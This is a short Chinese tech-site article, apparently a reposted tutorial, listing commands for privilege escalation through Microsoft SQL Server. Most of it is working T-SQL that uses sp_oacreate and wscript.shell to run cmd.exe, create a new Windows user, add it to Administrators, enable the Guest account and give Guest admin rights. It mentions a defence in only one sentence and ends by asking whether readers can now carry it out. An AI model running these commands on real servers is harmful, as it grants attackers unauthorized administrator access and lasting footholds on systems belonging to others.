SQL提权需要用到的命令

来源:爱站网时间:2022-08-11编辑:网友分享
今天小编来带大家说说看SQL提权需要用到的命令内容,如果将sqlserver的服务运行权限设置为普通用户,即可防止下面的提权,想要了解详细内容请看爱站技术频道小编整理的资料。

1、连接数据库
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名
2、添加新用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3、把用户加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4、激活GUEST用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'
5、把Guest加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'
关于防范方法,可以参考爱站技术频道服务器安全设置栏目。

有关于SQL提权需要用到的命令知识点,小编都给大家一一整理出来了,看完后是不是都会操作了。关注爱站技术频道网站,每天带你体验不一样的技术文章内容。

上一篇:批量查看字符所在的表及字段的SQL语句内容

下一篇:通用分页存储过程使用的sql语句

您可能感兴趣的文章

相关阅读

热门软件源码

最新软件源码下载